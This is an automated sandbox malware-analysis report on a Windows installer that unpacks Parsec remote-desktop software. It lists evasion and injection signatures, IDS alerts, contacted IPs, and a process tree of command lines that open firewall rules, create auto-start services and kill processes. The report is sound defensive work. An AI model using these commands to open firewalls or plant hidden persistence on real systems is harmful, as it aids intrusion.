Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
uu8v4UUzTU.exe

Overview

General Information

Sample name:uu8v4UUzTU.exe
renamed because original name is a hash value
Original sample name:4c750c11a04f90c9922ace4a237dc256d7e71fa512d4857922cc7d46bb4ba0e9.exe
Analysis ID:1555525
MD5:2d2f050e6c898065032cb2686a0effca
SHA1:0d3c1fbd9b7db74fdb5ee155b610d86319d9fa51
SHA256:4c750c11a04f90c9922ace4a237dc256d7e71fa512d4857922cc7d46bb4ba0e9
Tags:exeuser-suspicious_link
Infos:

Detection

Score:42
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
Creates an autostart registry key pointing to binary in C:\Windows
Creates files in the system32 config directory
Modifies the windows firewall
Sample is not signed and drops a device driver
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Tries to open files direct via NTFS file id
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries device information via Setup API
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • uu8v4UUzTU.exe (PID: 6836 cmdline: "C:\Users\user\Desktop\uu8v4UUzTU.exe" MD5: 2D2F050E6C898065032CB2686A0EFFCA)
    • uu8v4UUzTU.tmp (PID: 6880 cmdline: "C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp" /SL5="$10410,49640288,887296,C:\Users\user\Desktop\uu8v4UUzTU.exe" MD5: 828B7D7624C14BE1F3D8122F6E2FAC53)
      • cmd.exe (PID: 6008 cmdline: "CMD" /C "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • 7z.exe (PID: 2916 cmdline: "C:\Users\user\AppData\Roaming\PSecWin\7z.exe" x -aoa "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z" -p"fa073db961c" -o"C:\Users\user\AppData\Roaming\PSecWin\" MD5: 9A1DD1D96481D61934DCC2D568971D06)
      • cmd.exe (PID: 1860 cmdline: "CMD" /C del "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2256 cmdline: "CMD" /C del "SoundNight.7z" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5676 cmdline: "cmd" /C "C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • parsec-windows.exe (PID: 6232 cmdline: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe MD5: 01EF58E7C144C701B2EA01CFC049DBE4)
          • wscript.exe (PID: 5796 cmdline: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
            • sc.exe (PID: 3412 cmdline: "C:\Windows\System32\sc.exe" control Parsec 200 MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
              • conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • taskkill.exe (PID: 3368 cmdline: "C:\Windows\System32\taskkill.exe" /F /IM parsecd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
              • conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wscript.exe (PID: 7000 cmdline: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-remove.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
            • sc.exe (PID: 2756 cmdline: "C:\Windows\System32\sc.exe" stop Parsec MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
              • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • sc.exe (PID: 1028 cmdline: "C:\Windows\System32\sc.exe" delete Parsec MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
              • conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wscript.exe (PID: 2120 cmdline: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-remove.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
            • netsh.exe (PID: 5764 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
              • conhost.exe (PID: 6592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • netsh.exe (PID: 1860 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsec.exe MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
              • conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • netsh.exe (PID: 7084 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsecd.exe MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
              • conhost.exe (PID: 3068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wscript.exe (PID: 1888 cmdline: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\legacy-cleanup.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
            • schtasks.exe (PID: 2488 cmdline: "C:\Windows\System32\schtasks.exe" /delete /tn ParsecTeams /f MD5: 48C2FE20575769DE916F48EF0676A965)
              • conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wscript.exe (PID: 3140 cmdline: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-install.vbs" "C:\Program Files\Parsec\pservice.exe" MD5: FF00E0480075B095948000BDC66E81F0)
            • sc.exe (PID: 1516 cmdline: "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
              • conhost.exe (PID: 3492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • sc.exe (PID: 5688 cmdline: "C:\Windows\System32\sc.exe" start Parsec MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
              • conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wscript.exe (PID: 5500 cmdline: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-add.vbs" "C:\Program Files\Parsec\parsecd.exe" MD5: FF00E0480075B095948000BDC66E81F0)
            • netsh.exe (PID: 6436 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name=Parsec dir=in action=allow program="C:\Program Files\Parsec\parsecd.exe" enable=yes profile=public,private,domain MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
              • conhost.exe (PID: 1860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5796 cmdline: cmd /c "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 4960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • parsec-vud.exe (PID: 6188 cmdline: "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S MD5: 2D009D446A0BA83EC2F12242F7ED126C)
              • cmd.exe (PID: 5180 cmdline: cmd /c "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 6164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • nefconc.exe (PID: 6692 cmdline: "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA MD5: DDDEE00430F7A3D52580B7C85D63D9DC)
              • cmd.exe (PID: 1740 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 4900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • nefconw.exe (PID: 6872 cmdline: nefconw.exe --create-device-node --hardware-id Root\Parsec\VUSBA --class-name USB --class-guid "36fc9e60-c465-11cf-8056-444553540000" MD5: E9F2BC8C82AC755F47C7F89D1530F1A1)
                • nefconw.exe (PID: 7032 cmdline: nefconw.exe --install-driver --inf-path ".\parsecvusba\parsecvusba.inf" MD5: E9F2BC8C82AC755F47C7F89D1530F1A1)
                • nefconw.exe (PID: 2872 cmdline: nefconw.exe --inf-default-install --inf-path ".\parsecvirtualds\parsecvirtualds.inf" MD5: E9F2BC8C82AC755F47C7F89D1530F1A1)
                  • runonce.exe (PID: 7052 cmdline: "C:\Windows\system32\runonce.exe" -r MD5: 9ADEF025B168447C1E8514D919CB5DC0)
                    • grpconv.exe (PID: 4856 cmdline: "C:\Windows\System32\grpconv.exe" -o MD5: 8531882ACC33CB4BDC11B305A01581CE)
          • cmd.exe (PID: 4904 cmdline: cmd /c "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • parsec-vdd.exe (PID: 5936 cmdline: "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S MD5: 4B9A3048286692A865187013B70F44E8)
              • wevtutil.exe (PID: 3704 cmdline: wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man" MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
                • conhost.exe (PID: 1028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • wevtutil.exe (PID: 2284 cmdline: wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man" /fromwow64 MD5: 1AAE26BD68B911D0420626A27070EB8D)
              • cmd.exe (PID: 2424 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • nefconw.exe (PID: 6164 cmdline: .\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" MD5: E9F2BC8C82AC755F47C7F89D1530F1A1)
                • nefconw.exe (PID: 3468 cmdline: .\nefconw.exe --create-device-node --class-name Display --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" --hardware-id Root\Parsec\VDA MD5: E9F2BC8C82AC755F47C7F89D1530F1A1)
                • nefconw.exe (PID: 2080 cmdline: .\nefconw.exe --install-driver --inf-path ".\driver\mm.inf" MD5: E9F2BC8C82AC755F47C7F89D1530F1A1)
  • pservice.exe (PID: 1744 cmdline: "C:\Program Files\Parsec\pservice.exe" MD5: 46CD3FC327AF9109BD143BA7F16DF397)
  • svchost.exe (PID: 2724 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • drvinst.exe (PID: 3340 cmdline: DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\parsecvusba.inf" "9" "464910f03" "000000000000015C" "WinSta0\Default" "0000000000000174" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
    • drvinst.exe (PID: 6552 cmdline: DrvInst.exe "2" "201" "ROOT\USB\0000" "C:\Windows\System32\DriverStore\FileRepository\parsecvusba.inf_amd64_dae154cc0d6f64e9\parsecvusba.inf" "oem4.inf:*:*:0.2.8.0:Root\Parsec\VUSBA," "464910f03" "0000000000000170" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
    • drvinst.exe (PID: 1028 cmdline: DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\parsecvirtualds.inf" "9" "43799a85b" "000000000000015C" "WinSta0\Default" "00000000000000F4" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
    • drvinst.exe (PID: 6256 cmdline: DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "43799a85b" "00000000000000F4" "WinSta0\Default" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
    • drvinst.exe (PID: 2828 cmdline: DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "4fea13f63" "000000000000018C" "WinSta0\Default" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\runonce.exe, SourceProcessId: 7052, StartAddress: 221C5030, TargetImage: C:\Windows\System32\conhost.exe, TargetProcessId: 7052
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: grpconv -o, EventID: 13, EventType: SetValue, Image: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe, ProcessId: 2872, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs", CommandLine: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe, ParentImage: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe, ParentProcessId: 6232, ParentProcessName: parsec-windows.exe, ProcessCommandLine: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs", ProcessId: 5796, ProcessName: wscript.exe
Sigma detected: New Service Creation Using Sc.EXE
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own, CommandLine: "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-install.vbs" "C:\Program Files\Parsec\pservice.exe", ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 3140, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own, ProcessId: 1516, ProcessName: sc.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall, ProcessId: 2724, ProcessName: svchost.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-14T03:11:56.380228+010020229301A Network Trojan was detected20.109.210.53443192.168.2.449735TCP
2024-11-14T03:12:34.698407+010020229301A Network Trojan was detected20.109.210.53443192.168.2.449751TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-14T03:11:52.847685+010020283713Unknown Traffic192.168.2.44973334.160.111.145443TCP
2024-11-14T03:11:53.815227+010020283713Unknown Traffic192.168.2.449734188.114.97.3443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-14T03:11:54.801247+010020510911A Network Trojan was detected192.168.2.449734188.114.97.3443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC021000 #224,CryptBinaryToStringW,CertFreeCertificateContext,40_2_00007FF7EC021000
Source: uu8v4UUzTU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\ParsecJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscriptsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\firewall-add.vbsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\firewall-remove.vbsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\legacy-cleanup.vbsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\service-install.vbsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\service-kill-parsec.vbsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\service-remove.vbsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\vusbJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\vusb\parsec-vud.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\vddJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\vdd\parsec-vdd.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\teams.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\parsecd.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\pservice.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\skelJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\skel\parsecd-150-93b.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\skel\appdata.jsonJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\uninstall.exeJump to behavior
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\vusbuninstall.bat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.cat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.inf
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sys
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.cat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.inf
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.sys
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\uninstall.exe
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\vdduninstall.bat
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\driver
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.cat
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.dll
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.inf
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\mm.man
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\uninstall.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ParsecVUD
Source: unknownHTTPS traffic detected: 34.160.111.145:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: uu8v4UUzTU.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: RdpSaUacHelper.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-H8DB6.tmp.1.dr
Source: Binary string: Windows.ApplicationModel.ConversationalAgent.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cryptdlg.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TpmTool.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: icuin.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-BUN5H.tmp.1.dr
Source: Binary string: xpsservices.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wups.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ws2help.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WSClient.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-CEDA5.tmp.1.dr
Source: Binary string: ws2help.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wlanext.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
